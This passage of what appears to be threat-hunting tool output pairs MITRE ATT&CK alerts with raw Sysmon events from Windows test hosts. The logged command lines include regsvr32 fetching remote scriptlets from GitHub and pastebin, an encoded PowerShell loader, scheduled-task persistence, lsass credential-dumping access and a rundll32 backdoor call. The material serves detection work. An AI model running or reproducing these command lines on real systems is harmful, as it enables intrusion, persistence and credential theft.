<Data Name=""ParentProcessGuid"">747F3D96-3821-5EBB-0000-001040690000</Data>
<Data Name=""ParentProcessId"">732</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
</TimeCreated>
<EventRecordID>243538</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
<Data Name=""ProcessId"">2536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T00:35:07.474160Z"">
</TimeCreated>
<EventRecordID>376</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 00:35:07.386</Data>
<Data Name=""ProcessGuid"">365ABB72-47BB-5CE3-0000-00108CAD3E00</Data>
<Data Name=""ProcessId"">3176</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c pause</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-47BB-5CE3-0000-0010BFA83E00</Data>
<Data Name=""ParentProcessId"">1912</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Downloads\com-hijack.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\com-hijack.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
</TimeCreated>
<EventRecordID>243538</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
<Data Name=""ProcessId"">2536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:59.519768Z"">
</TimeCreated>
<EventRecordID>6193</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:59.510</Data>
<Data Name=""ProcessGuid"">365ABB72-FE7B-5CEB-0000-0010867F0C00</Data>
<Data Name=""ProcessId"">4012</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>10</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>10</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:10:03.991455Z"">
</TimeCreated>
<EventRecordID>4442</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""344"" ThreadID=""2032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 19:10:02.068</Data>
<Data Name=""SourceProcessGUID"">365ABB72-9B85-5C8E-0000-0010C4CC1200</Data>
<Data Name=""SourceProcessId"">3576</Data>
<Data Name=""SourceThreadId"">3620</Data>
<Data Name=""SourceImage"">C:\Windows\system32\taskmgr.exe</Data>
<Data Name=""TargetProcessGUID"">365ABB72-0886-5C8F-0000-001030560000</Data>
<Data Name=""TargetProcessId"">476</Data>
<Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
<Data Name=""GrantedAccess"">0x1fffff</Data>
<Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:48:52.766629Z"">
</TimeCreated>
<EventRecordID>16840</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""108"" ThreadID=""1268"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:48:52.344</Data>
<Data Name=""ProcessGuid"">365ABB72-6A94-5CD8-0000-0010C2F10E00</Data>
<Data Name=""ProcessId"">3880</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-695E-5CD8-0000-002015370100</Data>
<Data Name=""LogonId"">0x13715</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6A94-5CD8-0000-00101BDB0E00</Data>
<Data Name=""ParentProcessId"">1340</Data>
<Data Name=""ParentImage"">C:\ProgramData\jabber.exe</Data>
<Data Name=""ParentCommandLine"">jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.971708Z"">
</TimeCreated>
<EventRecordID>5907</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.931</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00108C7FFF00</Data>
<Data Name=""ProcessId"">3196</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:56:08.370067Z"">
</TimeCreated>
<EventRecordID>13</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1086,technique_name=PowerShell</Data>
<Data Name=""UtcTime"">2019-04-18 16:56:08.340</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">Powershell</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC01-5CB8-0000-0010BB7E0700</Data>
<Data Name=""ParentProcessId"">1196</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;cmd.exe&quot; /s /k pushd &quot;C:\Users\IEUser\Desktop&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-18T17:51:14.254967Z"">
</TimeCreated>
<EventRecordID>18851</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2044"" ThreadID=""1636"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-18 17:51:14.254</Data>
<Data Name=""ProcessGuid"">365ABB72-4612-5CE0-0000-00103D1E2600</Data>
<Data Name=""ProcessId"">2600</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
<Data Name=""LogonId"">0x13531</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
